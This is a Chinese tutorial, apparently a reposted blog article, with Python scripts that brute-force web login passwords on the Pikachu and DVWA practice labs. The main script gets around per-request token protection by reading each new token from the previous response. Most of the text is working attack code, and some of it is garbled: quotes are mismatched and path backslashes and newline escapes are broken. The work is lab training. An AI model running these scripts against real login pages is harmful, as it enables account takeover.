前言
上一篇暴力破解文章:一个简单的Python暴力破解网站登录密码脚本
测试靶机为Pikachu漏洞练习平台暴力破解模块下的 “token防爆破?”
春节期间歇了一阵子,吃睡玩看小说。写这个脚本的起因是因为burp设置带token的暴力破解我只会用pitchfork草叉模式,要是用cluster bomb集束炸弹模式笛卡儿积那样就不会了,所以就干脆把之前写的脚本加了点东西实现这个功能了,到时候有空再学学多线程,爆破速度就更快了。
关键代码解释
设置请求头
5~11行:指定url地址和请求头,user_token设置首次发送请求包时的token值。
url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = "8680761fe979039a6f836599906"
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Cookie": "PHPSESSID=17u0i2fakm84eq9oc24boc8715"
}
get_token函数获取token值
13~16行:这个函数返回从响应包中获取的token
在http响应包中有一个隐藏的标签里面有token值:
<input type="hidden" name="token" value="5874161fe8db950ca7993759020" />
第15行:soup.select查找标签名为input,name为token的元素的value的值。
def get_token(r):
soup = BeautifulSoup(r.text, "html.parser")
user_token = soup.select("input[name="token"]")[0]["value"]
return user_token
完整代码
from bs4 import BeautifulSoup
import requests
from requests.models import Response
url = "http://192.168.171.30/pikachu/vul/burteforce/bf_token.php"
user_token = "8680761fe979039a6f836599906"
#proxies = {"http": "http://127.0.0.1:8080"} # 代理设置,方便burp抓包查看和调试
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0",
"Cookie": "PHPSESSID=17u0i2fakm84eq9oc24boc8715"
}
def get_token(r):
soup = BeautifulSoup(r.text, "html.parser")
user_token = soup.select("input[name="token"]")[0]["value"]
return user_token
if __name__ == "__main__":
f = open("result.csv", "w") #把爆破结果储存到文件里,这里为csv格式
f.write("用户名" + "," + "密码" + "," + "包长度" + "
") #给文件设置标题
#遍历字典文件,Cluster bomb 暴力破解
for admin in open("C:UsersadminDocuments字典账号.txt"):
for line in open("C:UsersadminDocuments字典密码.txt"):
username = admin.strip()
password = line.strip()
payload = { #payload为POST的数据
"username": username,
"password": password,
"token": user_token,
"submit": "Login"
}
Response = requests.post(url, data=payload, headers=header)
result = username + "," + password + "," + str(len(Response.text)) #用户名密码以及响应包长度
print(result) #输出到终端
f.write(result + "
") #输出到文件
user_token = get_token(Response) #调用get_token函数获取下一次循环需要的token
print("
---完成---
")
f.close()
运行结果
查看保存的文件,查看包长度与其他不一样的数据
这里csv不会显示前缀会自动去掉首位0,可以把文件改成txt格式就正常显示了
尝试登陆一下,登录成功。
补充
下面小编为大家补充了另外两个利用Python实现破解网站登录密码的示例代码,希望对大家有所帮助
方法一:
import requests
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"} #代理设置,方便burp抓包查看
header = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Cookie":"security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u"
}
f = open("result.csv","w")
f.write("状态码" + "," + "用户名" + "," + "密码" + "," + "包长度" + "
")
for admin in open("C:UsersadminDocuments字典账号.txt"):
for line in open("C:UsersadminDocuments字典密码.txt"):
username = admin.strip()
password = line.strip()
payload = {"username":username,"password":password,"Login":"Login"}
Response = requests.get(url,params=payload,headers=header)
result = str(Response.status_code) + "," + username + ","
+ password + "," + str(len(Response.content))
f.write(result + "
")
print("
完成")
方法二:
import requests
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"} #代理设置,方便burp抓包查看
header = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0",
"Cookie":"security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u"
}
f = open("result.txt","w")
for admin in open("C:UsersadminDocuments字典账号.txt"):
for line in open("C:UsersadminDocuments字典密码.txt"):
username = admin.strip()
password = line.strip()
payload = {"username":username,"password":password,"Login":"Login"}
Response = requests.get(url,params=payload,headers=header)
if not(Response.text.find("Welcome to the password protected area")==-1):
result = username + ":" + password
print(result)
f.write(result + "
")
print("
完成")
以上就是Python实现破解网站登录密码(带token验证)的详细内容,更多关于Python破解网站登录密码的资料请关注服务器之家其它相关文章!
原文链接:https://blog.csdn.net/weixin_49125123/article/details/122794669
